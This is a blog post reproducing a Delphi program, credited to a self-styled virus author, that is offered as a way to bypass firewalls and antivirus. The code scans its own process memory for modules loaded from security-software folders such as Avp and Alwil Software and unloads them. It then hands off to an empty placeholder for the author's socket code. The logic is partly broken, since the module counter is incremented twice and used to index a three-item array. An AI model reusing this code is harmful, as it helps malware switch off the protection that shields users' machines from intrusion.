Bypass Firewall[VB6}
Kartikey Sapra 
Firwall bypassing
 coded by : Hs32-Idir.
 big  thank's to : aphex , madshi.

INFO :
 this example looks in the module list for the firwall & Avi DLL's injected in the memory of our process, and uninject it.
}

program HsIdirbypass; {program name}

uses windows,InjectionCode,Winsock;

var
{Set here your full path firwall installed }
firwallCompany : Array[1..3] of string = ('\Program Files\Avp\','\Program Files\Alwil Software\','\Program Files\Enter Your Firlwall Folder\');
Coder : String = 'Passive Socket, Lost firwall Coded by Hs32-Idir';

procedure BypassingAvi; { this will unload the firwall's module }
var
 Module, Base: pointer;
 ModuleCount: integer;
 lpModuleName: array [0..MAX_PATH] of char;
 MemoryBasicInformation: TMemoryBasicInformation;
begin
 ModuleCount := 0;
 Module := nil;
 Base := nil;
 while VirtualQueryEx(GetCurrentProcess, Module, MemoryBasicInformation, SizeOf(MemoryBasicInformation)) = SizeOf(MemoryBasicInformation) do
 begin
if (MemoryBasicInformation.State = MEM_COMMIT) and(MemoryBasicInformation.AllocationBase <> Base) and (MemoryBasicInformation.AllocationBase = MemoryBasicInformation.BaseAddress) and (GetModuleFileName(dword(MemoryBasicInformation.AllocationBase), lpModuleName, MAX_PATH) > 0) then
   begin
        ModuleCount := ModuleCount + 1;
        Inc(ModuleCount);
if Pos(firwallCompany[ModuleCount],pChar(@lpModuleName[0])) > 0 then {look for firwall's module injected}
        UninjectLibrary(GetCurrentProcess, pChar(@lpModuleName[0])); //->> W00t Lost your firwall
        InjectString(GetCurrentProcess,'Library Injected with Firwall Cleaned from this application');
  end;
   Base := MemoryBasicInformation.AllocationBase;
   dword(Module) := dword(Module) + MemoryBasicInformation.RegionSize;
 end;
end;

procedure startpassiveSocket;
begin
 // -->> Your code Winsock
end;

begin
 BypassingAvi; { first look for firwall's module }
 Sleep(50);    { Please Wa!t !!! }
 startpassiveSocket; { then lunch your socket's code }

{
 Written by Hs32-Idir[V-P] - 2006-2007
  MSN : Hs32-Idir@VirusProducts.Hack
  Web : wWw.Hs32-Idir.110mb.Com
 }
Labels:
0 Responses

Post a Comment

Subscribe to: Post Comments (Atom)